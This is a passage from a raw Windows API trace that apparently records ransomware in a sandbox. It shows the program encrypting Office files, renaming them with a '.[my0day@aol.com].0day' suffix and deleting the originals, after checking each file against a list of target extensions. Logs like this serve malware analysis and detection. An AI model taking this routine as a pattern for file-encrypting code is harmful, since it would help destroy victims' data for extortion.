lpNumberOfBytesWritten=0x2c5fc9c*=0x5c0, lpOverlapped=0x0) returned 1 [0040.210] ReadFile (in: hFile=0x204, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.210] WriteFile (in: hFile=0x208, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.210] SetEndOfFile (hFile=0x208) returned 1 [0040.210] CloseHandle (hObject=0x208) returned 1 [0040.211] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.211] SetEndOfFile (hFile=0x204) returned 1 [0040.211] CloseHandle (hObject=0x204) returned 1 [0040.211] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0040.212] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml")) returned 1 [0040.212] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0040.212] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0040.212] lstrlenW (lpString=".doc") returned 4 [0040.212] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.212] lstrlenW (lpString=".docx") returned 5 [0040.212] lstrcmpiW (lpString1=".docx", lpString2="f.XML") returned -1 [0040.212] lstrlenW (lpString=".pdf") returned 4 [0040.212] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.212] lstrlenW (lpString=".xls") returned 4 [0040.212] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.212] lstrlenW (lpString=".xlsx") returned 5 [0040.212] lstrcmpiW (lpString1=".xlsx", lpString2="f.XML") returned -1 [0040.212] lstrlenW (lpString=".ppt") returned 4 [0040.212] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.212] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0040.212] lstrlenW (lpString=".zip") returned 4 [0040.212] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.212] lstrlenW (lpString=".rar") returned 4 [0040.212] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.212] lstrlenW (lpString=".bz2") returned 4 [0040.212] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.212] lstrlenW (lpString=".7z") returned 3 [0040.212] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.213] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0040.213] lstrlenW (lpString=".dbf") returned 4 [0040.213] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.213] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0040.213] lstrlenW (lpString=".1cd") returned 4 [0040.213] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.213] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0040.213] lstrlenW (lpString=".jpg") returned 4 [0040.213] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.213] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0040.213] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0040.213] lstrlenW (lpString=".doc") returned 4 [0040.213] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.213] lstrlenW (lpString=".docx") returned 5 [0040.213] lstrcmpiW (lpString1=".docx", lpString2="f.XML") returned -1 [0040.213] lstrlenW (lpString=".pdf") returned 4 [0040.213] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.213] lstrlenW (lpString=".xls") returned 4 [0040.213] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.213] lstrlenW (lpString=".xlsx") returned 5 [0040.213] lstrcmpiW (lpString1=".xlsx", lpString2="f.XML") returned -1 [0040.213] lstrlenW (lpString=".ppt") returned 4 [0040.213] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.213] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0040.213] lstrlenW (lpString=".zip") returned 4 [0040.213] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.213] lstrlenW (lpString=".rar") returned 4 [0040.213] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.213] lstrlenW (lpString=".bz2") returned 4 [0040.213] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.213] lstrlenW (lpString=".7z") returned 3 [0040.213] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.213] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0040.213] lstrlenW (lpString=".dbf") returned 4 [0040.213] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.214] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0040.214] lstrlenW (lpString=".1cd") returned 4 [0040.214] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.214] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0040.214] lstrlenW (lpString=".jpg") returned 4 [0040.214] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.214] lstrcmpiW (lpString1=".XML", lpString2=".0day") returned 1 [0040.214] lstrlenW (lpString="SETUP.XML") returned 9 [0040.214] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0040.228] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=5884) returned 1 [0040.237] CloseHandle (hObject=0x170) returned 1 [0040.237] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml")) returned 0x20 [0040.238] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0040.238] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0040.238] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.238] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.238] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0040.242] GetLastError () returned 0x0 [0040.242] ReadFile (in: hFile=0x170, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x16fc, lpOverlapped=0x0) returned 1 [0040.245] WriteFile (in: hFile=0x208, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x1700, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x1700, lpOverlapped=0x0) returned 1 [0040.246] ReadFile (in: hFile=0x170, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.246] WriteFile (in: hFile=0x208, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.246] SetEndOfFile (hFile=0x208) returned 1 [0040.246] CloseHandle (hObject=0x208) returned 1 [0040.247] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.247] SetEndOfFile (hFile=0x170) returned 1 [0040.248] CloseHandle (hObject=0x170) returned 1 [0040.248] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0040.248] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml")) returned 1 [0040.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0040.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0040.248] lstrlenW (lpString=".doc") returned 4 [0040.248] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.249] lstrlenW (lpString=".docx") returned 5 [0040.249] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.249] lstrlenW (lpString=".pdf") returned 4 [0040.249] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.249] lstrlenW (lpString=".xls") returned 4 [0040.249] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.249] lstrlenW (lpString=".xlsx") returned 5 [0040.249] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.249] lstrlenW (lpString=".ppt") returned 4 [0040.249] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0040.249] lstrlenW (lpString=".zip") returned 4 [0040.249] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.249] lstrlenW (lpString=".rar") returned 4 [0040.249] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.249] lstrlenW (lpString=".bz2") returned 4 [0040.249] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.249] lstrlenW (lpString=".7z") returned 3 [0040.249] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0040.249] lstrlenW (lpString=".dbf") returned 4 [0040.249] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0040.249] lstrlenW (lpString=".1cd") returned 4 [0040.249] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0040.249] lstrlenW (lpString=".jpg") returned 4 [0040.249] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0040.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0040.249] lstrlenW (lpString=".doc") returned 4 [0040.249] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.249] lstrlenW (lpString=".docx") returned 5 [0040.249] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.249] lstrlenW (lpString=".pdf") returned 4 [0040.250] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.250] lstrlenW (lpString=".xls") returned 4 [0040.250] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.250] lstrlenW (lpString=".xlsx") returned 5 [0040.250] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.250] lstrlenW (lpString=".ppt") returned 4 [0040.250] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0040.250] lstrlenW (lpString=".zip") returned 4 [0040.250] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.250] lstrlenW (lpString=".rar") returned 4 [0040.250] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.250] lstrlenW (lpString=".bz2") returned 4 [0040.250] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.250] lstrlenW (lpString=".7z") returned 3 [0040.250] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0040.250] lstrlenW (lpString=".dbf") returned 4 [0040.250] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0040.250] lstrlenW (lpString=".1cd") returned 4 [0040.250] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0040.250] lstrlenW (lpString=".jpg") returned 4 [0040.250] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.250] lstrcmpiW (lpString1=".XML", lpString2=".0day") returned 1 [0040.250] lstrlenW (lpString="PublisherMUI.XML") returned 16 [0040.250] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0040.251] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=1450) returned 1 [0040.251] CloseHandle (hObject=0x170) returned 1 [0040.251] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml")) returned 0x20 [0040.251] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0040.251] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0040.251] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.251] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.251] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0041.791] GetLastError () returned 0x0 [0041.791] ReadFile (in: hFile=0x170, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x5aa, lpOverlapped=0x0) returned 1 [0041.829] WriteFile (in: hFile=0x208, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0041.830] ReadFile (in: hFile=0x170, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0041.830] WriteFile (in: hFile=0x208, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xf4, lpOverlapped=0x0) returned 1 [0041.830] SetEndOfFile (hFile=0x208) returned 1 [0041.830] CloseHandle (hObject=0x208) returned 1 [0041.831] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.831] SetEndOfFile (hFile=0x170) returned 1 [0041.832] CloseHandle (hObject=0x170) returned 1 [0041.832] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0041.832] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml")) returned 1 [0041.832] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0041.832] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0041.832] lstrlenW (lpString=".doc") returned 4 [0041.832] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.832] lstrlenW (lpString=".docx") returned 5 [0041.832] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0041.832] lstrlenW (lpString=".pdf") returned 4 [0041.832] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.832] lstrlenW (lpString=".xls") returned 4 [0041.832] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.832] lstrlenW (lpString=".xlsx") returned 5 [0041.832] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0041.832] lstrlenW (lpString=".ppt") returned 4 [0041.833] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.833] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0041.833] lstrlenW (lpString=".zip") returned 4 [0041.833] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.833] lstrlenW (lpString=".rar") returned 4 [0041.833] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.833] lstrlenW (lpString=".bz2") returned 4 [0041.833] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.833] lstrlenW (lpString=".7z") returned 3 [0041.833] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.833] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0041.833] lstrlenW (lpString=".dbf") returned 4 [0041.833] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.833] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0041.833] lstrlenW (lpString=".1cd") returned 4 [0041.833] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.833] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0041.833] lstrlenW (lpString=".jpg") returned 4 [0041.833] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.833] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0041.833] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0041.833] lstrlenW (lpString=".doc") returned 4 [0041.833] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.833] lstrlenW (lpString=".docx") returned 5 [0041.833] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0041.833] lstrlenW (lpString=".pdf") returned 4 [0041.833] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.833] lstrlenW (lpString=".xls") returned 4 [0041.833] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.833] lstrlenW (lpString=".xlsx") returned 5 [0041.833] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0041.833] lstrlenW (lpString=".ppt") returned 4 [0041.833] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.834] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0041.834] lstrlenW (lpString=".zip") returned 4 [0041.834] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.834] lstrlenW (lpString=".rar") returned 4 [0041.834] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.834] lstrlenW (lpString=".bz2") returned 4 [0041.834] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.834] lstrlenW (lpString=".7z") returned 3 [0041.834] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.834] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0041.834] lstrlenW (lpString=".dbf") returned 4 [0041.834] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.834] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0041.834] lstrlenW (lpString=".1cd") returned 4 [0041.834] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.834] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0041.834] lstrlenW (lpString=".jpg") returned 4 [0041.834] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.834] lstrcmpiW (lpString1=".emf", lpString2=".0day") returned 1 [0041.834] lstrlenW (lpString="Genko_2.emf") returned 11 [0041.834] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_2.emf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0042.623] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=10340) returned 1 [0042.623] CloseHandle (hObject=0x174) returned 1 [0042.623] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_2.emf")) returned 0x20 [0042.623] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_2.emf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0042.623] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_2.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.623] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.623] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.623] lstrlenW (lpString=".doc") returned 4 [0042.623] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0042.623] lstrlenW (lpString=".docx") returned 5 